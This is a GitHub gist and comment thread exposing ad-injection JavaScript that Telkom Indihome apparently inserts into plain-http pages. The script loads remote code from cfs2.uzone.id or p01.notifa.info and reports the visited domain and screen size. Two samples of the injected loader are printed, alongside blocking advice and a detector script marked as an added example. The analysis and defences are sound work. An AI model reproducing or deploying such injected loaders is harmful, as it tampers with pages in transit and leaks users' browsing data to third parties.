@donnykurnia
Last active June 29, 2022 04:35
Injection code from Telkom Indihome. This code replaces </body> at the end of a web page with the code below. The content may vary, but the main payload is loaded from cfs2.uzone.id.
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnCgur28FUm401VrTNseDf2JlEA6ZiOk%2ffQK22KycK5kPdVDjpnejkM9P73Pe7Y6EuuaOitYkmzmKNO8RUzaFdaIXn6R7NkvKk9cKCHQzyvNXXPs%2bsueqLp2EKbC6X0Nu38%2fmvVexzHBsuqHkiQG%2bNd%2bm8E%2f1Gq6XVEDRBd4yBsks3piKPJIEbKaNRdQVxqlbqy5Bs6h0iSFn8zyf11ihllrf6ZNmrJse7MMGOa5Bg8V4gb29r7%2bHjvRblYlXTzoDaVMg79rr8%2fNSZ6ssVfsxi0UIiVvCjFalmdmUa4D3V21bRqM4cgubmchEbbS%2bil%2bkh%2bMxt3Lc4cILEYiziKexsYIRCUr4wR%2fPBUNQ0j4IIx1jEuAgOLeRdwvvw4aFM0V1i21bvKCvX8DaMIllnngEEJ09Ev%2fVl90I1UyrYKv6AaTOlPRBinecqub0KT%2flfLk3J5BMJsGhRjFCfISXqn01lRdvFPPMPwF0W10PRF8Of4%2feqOmNt6%2f1%2bIe66Xn2XLzyo%2fXuwHgr8%2fESw2BJ%2fexkP13jBCMQ6mGWGfQ671Tl0qDCRxz3%2fSr7a%2fgD3rwBAepraDryNlMplNKwfDkn1RshIR2yOHd%2fT9f%2bWyzvKgo2q%2bBVg19biKxt2MA%2b51lkpH9op3ufeUcUr06SkECqC57ZaT0Gy%2btFzIpw7WrVWNOUR2IagZkIGRtvs8fT78yLbMJYt7QL2KA1NeaqJ1oxvPiRhbpzwbaEvCh2IpkWW4arhunYT9DWgF1jaNRjn1c6n%2fzCUZvEw8o0sgvMEHBsLP0VK4Q%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
The IP address of cfs2.uzone.id is 180.250.66.131.
You just need to block this IP address in your router firewall or PC firewall, and the ads will be gone.
Shame on you, Telkom Indonesia.
@brehehe

brehehe commented Mar 9, 2018

It looks like it appears only on http pages, nothing on secure pages.
Here's what I got:

if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mr%2fvRbdSFMrh4JdxivCWF5IBgEx%2b518i7w7ix2wtGE6suih3GpzKuQqX0W2%2bZA6JLybv6qXL9CV7ok8vF4B27hRvqA6FSBQunP8hpmmimv5AFTgJeP%2fO3kPpjLpoUd5kfvgm1H0NWW6TarYD%2fpSGv5lGv1OSQIPSh8CvyQrYKRRMRUFYkiwXm1Mbp1LgVMnM9tH3cV3NchDWWsbeTazb7vfZ%2b%2bFj3v1fIWakmhFSMoiFUmKwVGff9kh%2bMQNYrBYFMww4dRAVfW8vxYUXVmujTSFI7FE5jAbjIrGa9Ge8bTjZWpm2vZaKrKn31llH%2bAM1cRpRHfVHrzO2THwSZ5IPIyrIntbw8ZzT5wr9njSHdwzQEhIsFQXeeLgLC2nbouJdOoAFcxNz%2f2Jb1%2fVLtYCxikqjmv5dciCN%2bQuzMcsm7xo1ZDLn5mukwuOOKAF18RxSU5VW7SCrFax10cVS9D6GICQY748msuvJqe06ReNkpTAphjVp%2brdzKgaM%2bGZUfZtsHxT53UW0PZ5NiRUI1ZpffO0BxNZeU%2bpE%2fnfFoCa%2fxFxTxNMvcuMTPuQ%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

@damzaky

damzaky commented Mar 10, 2018

is this actually legal? because if it's illegal, we can sue anytime

@rheeqp

rheeqp commented Apr 23, 2018

illegal according to ITE Act article 32 paragraph (1). they changed electronic information when it was transmitted from server to client.

@gaibz

gaibz commented May 25, 2018

That's stupid telkampret .. injecting some error script into the websites that users visit ..
I've tried so many things to be done with this .. but never got done with it ..

The only solution is to use https instead of http..

@Crescendo-BLYAT

illegal, but since this is govt owned, it's legalized internally...

and they can change the domain as they please, as they technically control the domain registration...

@adisazhar123

Wow. I've been wondering what that shit was. So it's from my ISP? Damn lol

@munanjar

munanjar commented Dec 27, 2018

I have to delete (not use) the /body tag and the /html tag and let the browser close the tags itself to prevent this from happening.

@AbuReyhan

AbuReyhan commented Jan 3, 2019

I have to delete (not use) the /body tag and the /html tag and let the browser close the tags itself to prevent this from happening.

Hello, how do I deal with "p01.notifa.info" being detected by the free version of Avast? http://prntscr.com/m2eq6p
The notification appears every 5 minutes. Thank you.

@martanto

martanto commented Jan 4, 2019

@lucernae

lucernae commented Jan 9, 2019

Yo, is this still a problem?

@DarisAlf

DarisAlf commented Feb 20, 2019

A quick Google search nets me a ton of articles saying that this practice is taking place all over the world. Worse yet, I did not find any possible solutions whatsoever. I guess we have to endure our lives in this ugly capitalist world, unfortunately.

Consider yourselves lucky if you're using an antivirus that blocks this disaster.

@jessicael

"p01.notifa.info" is already auto-blocked by my antivirus (Bitdefender) and was detected as a phishing attempt, lol. No hassle at all.

@abdilahrf

For now you can use this: https://gist.github.com/abdilahrf/b63b6c0313d77fe2a51e18bfb4a8bb05

On Linux add it to the /etc/hosts file, and on Windows to /System32/drivers/etc/hosts

@fransallen

They can change the IP address whenever they want, so in case they do that:

  1. Just add cfs2.uzone.id to your /etc/hosts.
  2. Add cfs2.uzone.id to your adblock blacklist filter.
  3. And if you manage multiple environments (home, office, etc.), use a dedicated DNS server that you can manage on your own.

Be in control of your internet connection!

@krisnaw

krisnaw commented Jun 9, 2019

Just add SSL

@donnykurnia
Author

donnykurnia commented Jun 10, 2019

@krisnaw yes, if you are a webmaster, adding SSL will prevent your website from getting injected with ads. This gist is for ISP customers who cannot force all websites to use https. We can still fight back by adding their ads domain to the blacklist.

@yasirharis

Comment out all the html, head and body tags. The browser will add them automatically.

Sample:

<html> to <!--<html> -->
<head> to <!--<head>-->

and so on

@f0x48

f0x48 commented Oct 8, 2019

For those curious about what data is collected:

  1. The website you visit (the domain parameter)
  2. Your screen resolution (the sw and sh parameters)
  3. Cookies on the websites you visit
Query string	
id	1
enc	9UwkxLgY9
params	4TtHaUQnUEiP6K/c5C582Am8lISurprAUlOO9Isbj7WdvGI1HwVrd0iTnkVaSNpWp8BVqbjH zdb68ukjSoIxldxgiv/egRUV1841vIHK7UWD0PkGGYzMJJ180SwNm1a1zo3F5TU5SrR2WE5vnn9TcHrSZnriovmGXGFnz9RhTJMnbdDBJ3VMSNlGB7xBcmDhL3PlKKCOGOou xGoRgX4 eOZEWWSZMmJPE/McBD91t1WutHPE4IRToImofbey U0a/0jukLAapg/cTC99YQiknBIfl0wxAiEuyX3GN5kN9acZC /h0a6Tp4BLJtjLm/zGBqcE3rLJ9IhbpUnemvmM4Qv3uTQXazkX bKi4vZfmXD6ktpA sJtW6y3oiTAzr6GHqr/GGPexxhqQR3oMBE2HOVOH190PwkCuzxAQb0CgmTYkDFWZ3 4XFQDuYK8g6L9X3Rm2ndpwGP5upVVzaVW9u/8U IC6/tNc4b8PTymNqu92VNmMAHwNidhU WngbkDutaSLVDqU5drfgcpO7VA==
idc_r	00000000
domain	www.example.com
sw	1390
sh	768
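
An added example, not part of the gist or of any comment above: a small detector that scans fetched HTML for this loader, keyed on the function names common to both samples on this page rather than on the changing host, and reports the endpoint plus the query parameters filled from browser properties. The names `SAMPLE_HTML`, `MARKERS`, `findInjectedLoader` and `hostsEntry` are hypothetical, and the sample is a shortened, constructed copy of the loader with the `params` value replaced by a placeholder.

```javascript
// Constructed sample: shortened copy of the loader shown on this page,
// with the long "params" value replaced by a placeholder.
const SAMPLE_HTML = '<p>page</p><script type="text/javascript">if (self==top) {' +
  'function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}' +
  'function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");' +
  'var idc_glo_r = Math.floor(Math.random()*99999999999);' +
  'var url = idc_glo_url+ "cfs2.uzone.id/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + ' +
  '"&params=" + "PLACEHOLDER" + "&idc_r="+idc_glo_r + "&domain="+document.domain + ' +
  '"&sw="+screen.width+"&sh="+screen.height;}' +
  'netbro_cache_analytics(requestCfs, function(){});};</script></body>';

// Function names shared by both loader samples on this page. The host differs
// between the samples, so detection keys on the names, not on the domain.
const MARKERS = ['netbro_cache_analytics', 'requestCfs'];

function findInjectedLoader(html) {
  const scripts = html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi);
  for (const [, body] of scripts) {
    if (!MARKERS.every((m) => body.includes(m))) continue;
    // Host and path: the first string literal appended to the scheme variable.
    const ep = body.match(/idc_glo_url\s*\+\s*"([^"\/]+)(\/[^"?]*)"/);
    // Query parameters whose value is a browser property rather than a literal.
    const leaked = {};
    const re = /"[?&](\w+)="\s*\+\s*((?:document|screen|navigator|location)\.[\w.]+)/g;
    for (const [, name, expr] of body.matchAll(re)) leaked[name] = expr;
    return { host: ep ? ep[1] : null, path: ep ? ep[2] : null, leaked };
  }
  return null; // no inline script carries the loader markers
}

// Hosts-file entry for the detected host (the blocking approach from the comments).
function hostsEntry(finding) {
  return finding && finding.host ? `0.0.0.0 ${finding.host}` : null;
}

const finding = findInjectedLoader(SAMPLE_HTML);
console.log(finding, hostsEntry(finding));
```

Run it against pages fetched over plain http from the affected connection; a non-null result gives the current host to add to the blocklist even after the domain changes.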

@antelove19

antelove19 commented Dec 31, 2019

wow...

script vs script

The Telkom script will replace the </body> tag with their script, so we must prevent it by adding an opening comment tag before the </body> tag.

This script uses jQuery, because I use it for the web.

Before </body>, add this script:

        <script>
            $( function() {
                $(this).after("<!--") // the injected code will be commented out
            } );
        </script>

antelove.com

Join us, in dev.to

@maulvi

maulvi commented Apr 19, 2020

The thing is, no one in Indonesia has enough balls to sue them.

@donnykurnia
Author

@maulvi the justice system here is hopeless... most of the prosecutors and judges had no knowledge about internet technology. Plus, Telkom had put the ads point into the subscription agreement.

@anggara-ts

But according to this comment, it is not mere ads if it steals our cookies. Can we report p01.notifa.info and cfs2.uzone.id as deceptive sites (malware) here?

Adding those domains to /etc/hosts will only help us, not our web visitors.
Currently, adding SSL is the only clean option. I would not like to mess up my site's DOM by commenting out HTML tags.

@alghifari24

alghifari24 commented Apr 24, 2020

It's quite simple, you have to do that with a Content-Security-Policy tag in the index.html
https://content-security-policy.com/

Example:
<meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline' 'unsafe-eval' 'self' https://yourdomain.com http://yourdomain.com; img-src 'self' data: * blob:">

@fauzi-id

You have to connect to a VPN and the ads are gone.

@ifaniqbal

Is this what makes the Ubuntu repository (non-secure http) inaccessible?

@donnykurnia
Author

@ifaniqbal it shouldn't be, because I tested with curl and the result has no ad injection added by Indihome

curl http://buaya.klas.or.id/ubuntu/dists/hirsute/InRelease

Try testing it yourself at your place.

@ifaniqbal

@ifaniqbal it shouldn't be, because I tested with curl and the result has no ad injection added by Indihome

curl http://buaya.klas.or.id/ubuntu/dists/hirsute/InRelease

Try testing it yourself at your place.

The result:
curl: (56) Recv failure: Connection reset by peer

@donnykurnia
Author

@ifaniqbal probably because of the firewall or proxy settings in use

https://stackoverflow.com/a/10349895/141177

@maulvi

maulvi commented Aug 12, 2021

Is this what makes the Ubuntu repository (non-secure http) inaccessible?

I've experienced this too; sometimes when it acts up, http usually can't be accessed, and to update the repo I have to use a proxy.

@ifaniqbal

@ifaniqbal probably because of the firewall or proxy settings in use

https://stackoverflow.com/a/10349895/141177

Is this what makes the Ubuntu repository (non-secure http) inaccessible?

I've experienced this too; sometimes when it acts up, http usually can't be accessed, and to update the repo I have to use a proxy.

Thanks @donnykurnia and @maulvi. I reported it earlier via the Indihome website; the report was "cannot update Linux, the following repo gives an error, connection failed". Telkom has resolved it by moving me to a network that is not "slow".

Telkom said that if you get an IP below ..*.10 it is usually slow. I was moved to IP 11 and now it runs smoothly. You can check the IP via speedtest.

Now sudo apt update runs smoothly:

Hit:1 https://download.docker.com/linux/ubuntu hirsute InRelease
Hit:2 https://brave-browser-apt-release.s3.brave.com stable InRelease                                                                      
Hit:3 https://mirror.amscloud.co.id/ubuntu hirsute InRelease                                                                               
Hit:4 https://dl.winehq.org/wine-builds/ubuntu hirsute InRelease                                                                           
Hit:5 https://mirror.amscloud.co.id/ubuntu hirsute-security InRelease                                                                      
Hit:6 https://mirror.amscloud.co.id/ubuntu hirsute-updates InRelease                                                                       
Hit:7 https://mirror.amscloud.co.id/ubuntu hirsute-backports InRelease                                                                     
Hit:8 http://ppa.launchpad.net/linrunner/tlp/ubuntu hirsute InRelease                                                        
Hit:9 http://apt.pop-os.org/proprietary hirsute InRelease                                                                        
Hit:10 http://ppa.launchpad.net/system76/pop/ubuntu hirsute InRelease                                                            
Hit:11 https://download.sublimetext.com apt/stable/ InRelease                   
Hit:12 http://ppa.launchpad.net/ubuntuhandbook1/apps/ubuntu hirsute InRelease
